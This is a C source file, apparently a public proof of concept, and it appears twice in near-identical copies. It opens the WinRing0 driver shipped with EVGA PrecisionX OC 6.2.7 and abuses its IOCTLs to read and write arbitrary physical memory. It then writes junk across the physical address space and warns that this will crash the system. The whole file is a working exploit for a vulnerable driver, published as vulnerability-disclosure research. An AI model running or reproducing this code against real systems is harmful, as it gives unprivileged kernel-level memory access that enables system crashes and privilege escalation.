hfiref0x/wr0_demo3.c

## wr0_demo3.c
#include <windows.h>
#include <cstdio>

#define DEVICE_WR0_TYPE 40000
#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0")

HANDLE g_handleWR0 = INVALID_HANDLE_VALUE;

#define IOCTL_WR0_READ_MEMORY   CTL_CODE(DEVICE_WR0_TYPE, 0x841, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_WR0_WRITE_MEMORY  CTL_CODE(DEVICE_WR0_TYPE, 0x842, METHOD_BUFFERED, FILE_WRITE_ACCESS)

typedef struct  _WR0_READ_MEMORY_INPUT {
    ULARGE_INTEGER Address;
    ULONG UnitSize;
    ULONG Count;
} WR0_READ_MEMORY_INPUT, *PWR0_READ_MEMORY_INPUT;

typedef struct  _WR0_WRITE_MEMORY_INPUT {
    ULARGE_INTEGER Address;
    ULONG UnitSize;
    ULONG Count;
    UCHAR Data[1];
} WR0_WRITE_MEMORY_INPUT, *PWR0_WRITE_MEMORY_INPUT;

BOOL ReadPhysicalMemory(
    _In_ ULONG_PTR PhysicalAddress,
    _In_ PBYTE Buffer,
    _In_ ULONG Count,
    _In_ ULONG UnitSize,
    _Out_ ULONG *BytesRead
)
{
    WR0_READ_MEMORY_INPUT request;

    *BytesRead = 0;

    request.Address.QuadPart = PhysicalAddress;
    request.UnitSize = UnitSize;
    request.Count = Count;

    ULONG numberOfBytes = request.UnitSize * request.Count;
    ULONG bytesIO;

    if (DeviceIoControl(
        g_handleWR0,
        IOCTL_WR0_READ_MEMORY,
        &request,
        sizeof(WR0_READ_MEMORY_INPUT),
        Buffer,
        numberOfBytes,
        &bytesIO,
        NULL))
    {
        *BytesRead = bytesIO;
        return TRUE;
    }

    return FALSE;
}

BOOL WritePhysicalMemory(
    _In_ ULONG_PTR PhysicalAddress,
    _In_ PBYTE Buffer,
    _In_ ULONG Count,
    _In_ ULONG UnitSize,
    _Out_ ULONG* BytesWritten
)
{
    WR0_WRITE_MEMORY_INPUT *request;

    *BytesWritten = 0;

    ULONG numberOfBytes = FIELD_OFFSET(WR0_WRITE_MEMORY_INPUT, Data) + Count * UnitSize;

    request = (WR0_WRITE_MEMORY_INPUT*)VirtualAlloc(NULL,
        (SIZE_T)numberOfBytes,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE);

    if (request == NULL)
        return FALSE;

    request->Address.QuadPart = PhysicalAddress;
    request->Count = Count;
    request->UnitSize = UnitSize;

    RtlCopyMemory(request->Data, Buffer, Count * UnitSize);

    ULONG bytesIO;

    BOOL bResult = FALSE;

    bResult = DeviceIoControl(
        g_handleWR0,
        IOCTL_WR0_WRITE_MEMORY,
        request,
        numberOfBytes,
        NULL,
        0,
        &bytesIO,
        NULL);

    if (bResult) {
        *BytesWritten = bytesIO;
    }

    VirtualFree(request, 0, MEM_RELEASE);

    return bResult;
}

BOOLEAN InitDriver()
{
    g_handleWR0 = CreateFile(WR0_DEVICE_LINK,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (g_handleWR0 == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        return FALSE;
    }


    return TRUE;
}


int Demo3()
{
    printf_s("EVGA PrecisionX OC 6.2.7 Arbitrary physical memory read/write demo\r\n");

    ULONG bytesIO = 0;
    UCHAR Buffer[4096];

    RtlSecureZeroMemory(&Buffer, sizeof(Buffer));

    ReadPhysicalMemory(0x30000000,
        (PBYTE)&Buffer,
        4096,
        1,
        &bytesIO);

    printf_s("Arbitrary physical memory write demo\r\n");
    printf_s("This will crash system\r\n");

    system("pause");

    ULONG_PTR Data = 0xFFFFABCDFFFFABCD;

    for (ULONG i = 0; i < 0xFFFFFFFF; i += 0x1000) {

        WritePhysicalMemory(i,
            (PBYTE)&Data,
            sizeof(ULONG_PTR),
            1,
            &bytesIO);
    }

    //
    // Never here
    //
    CloseHandle(g_handleWR0);
    return 0;
}

int main()
{
    if (!InitDriver())
        return -1;

    return Demo3();
}
	#include <windows.h>
	#include <cstdio>

	#define DEVICE_WR0_TYPE 40000
	#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0")

	HANDLE g_handleWR0 = INVALID_HANDLE_VALUE;

	#define IOCTL_WR0_READ_MEMORY CTL_CODE(DEVICE_WR0_TYPE, 0x841, METHOD_BUFFERED, FILE_READ_ACCESS)
	#define IOCTL_WR0_WRITE_MEMORY CTL_CODE(DEVICE_WR0_TYPE, 0x842, METHOD_BUFFERED, FILE_WRITE_ACCESS)

	typedef struct _WR0_READ_MEMORY_INPUT {
	ULARGE_INTEGER Address;
	ULONG UnitSize;
	ULONG Count;
	} WR0_READ_MEMORY_INPUT, *PWR0_READ_MEMORY_INPUT;

	typedef struct _WR0_WRITE_MEMORY_INPUT {
	ULARGE_INTEGER Address;
	ULONG UnitSize;
	ULONG Count;
	UCHAR Data[1];
	} WR0_WRITE_MEMORY_INPUT, *PWR0_WRITE_MEMORY_INPUT;

	BOOL ReadPhysicalMemory(
	_In_ ULONG_PTR PhysicalAddress,
	_In_ PBYTE Buffer,
	_In_ ULONG Count,
	_In_ ULONG UnitSize,
	_Out_ ULONG *BytesRead
	)
	{
	WR0_READ_MEMORY_INPUT request;

	*BytesRead = 0;

	request.Address.QuadPart = PhysicalAddress;
	request.UnitSize = UnitSize;
	request.Count = Count;

	ULONG numberOfBytes = request.UnitSize * request.Count;
	ULONG bytesIO;

	if (DeviceIoControl(
	g_handleWR0,
	IOCTL_WR0_READ_MEMORY,
	&request,
	sizeof(WR0_READ_MEMORY_INPUT),
	Buffer,
	numberOfBytes,
	&bytesIO,
	NULL))
	{
	*BytesRead = bytesIO;
	return TRUE;
	}

	return FALSE;
	}

	BOOL WritePhysicalMemory(
	_In_ ULONG_PTR PhysicalAddress,
	_In_ PBYTE Buffer,
	_In_ ULONG Count,
	_In_ ULONG UnitSize,
	_Out_ ULONG* BytesWritten
	)
	{
	WR0_WRITE_MEMORY_INPUT *request;

	*BytesWritten = 0;

	ULONG numberOfBytes = FIELD_OFFSET(WR0_WRITE_MEMORY_INPUT, Data) + Count * UnitSize;

	request = (WR0_WRITE_MEMORY_INPUT*)VirtualAlloc(NULL,
	(SIZE_T)numberOfBytes,
	MEM_COMMIT \| MEM_RESERVE,
	PAGE_READWRITE);

	if (request == NULL)
	return FALSE;

	request->Address.QuadPart = PhysicalAddress;
	request->Count = Count;
	request->UnitSize = UnitSize;

	RtlCopyMemory(request->Data, Buffer, Count * UnitSize);

	ULONG bytesIO;

	BOOL bResult = FALSE;

	bResult = DeviceIoControl(
	g_handleWR0,
	IOCTL_WR0_WRITE_MEMORY,
	request,
	numberOfBytes,
	NULL,
	0,
	&bytesIO,
	NULL);

	if (bResult) {
	*BytesWritten = bytesIO;
	}

	VirtualFree(request, 0, MEM_RELEASE);

	return bResult;
	}

	BOOLEAN InitDriver()
	{
	g_handleWR0 = CreateFile(WR0_DEVICE_LINK,
	GENERIC_READ \| GENERIC_WRITE,
	0,
	NULL,
	OPEN_EXISTING,
	0,
	NULL);

	if (g_handleWR0 == INVALID_HANDLE_VALUE) {
	printf_s("[!] Unable to open device\r\n");
	return FALSE;
	}


	return TRUE;
	}


	int Demo3()
	{
	printf_s("EVGA PrecisionX OC 6.2.7 Arbitrary physical memory read/write demo\r\n");

	ULONG bytesIO = 0;
	UCHAR Buffer[4096];

	RtlSecureZeroMemory(&Buffer, sizeof(Buffer));

	ReadPhysicalMemory(0x30000000,
	(PBYTE)&Buffer,
	4096,
	1,
	&bytesIO);

	printf_s("Arbitrary physical memory write demo\r\n");
	printf_s("This will crash system\r\n");

	system("pause");

	ULONG_PTR Data = 0xFFFFABCDFFFFABCD;

	for (ULONG i = 0; i < 0xFFFFFFFF; i += 0x1000) {

	WritePhysicalMemory(i,
	(PBYTE)&Data,
	sizeof(ULONG_PTR),
	1,
	&bytesIO);
	}

	//
	// Never here
	//
	CloseHandle(g_handleWR0);
	return 0;
	}

	int main()
	{
	if (!InitDriver())
	return -1;

	return Demo3();
	}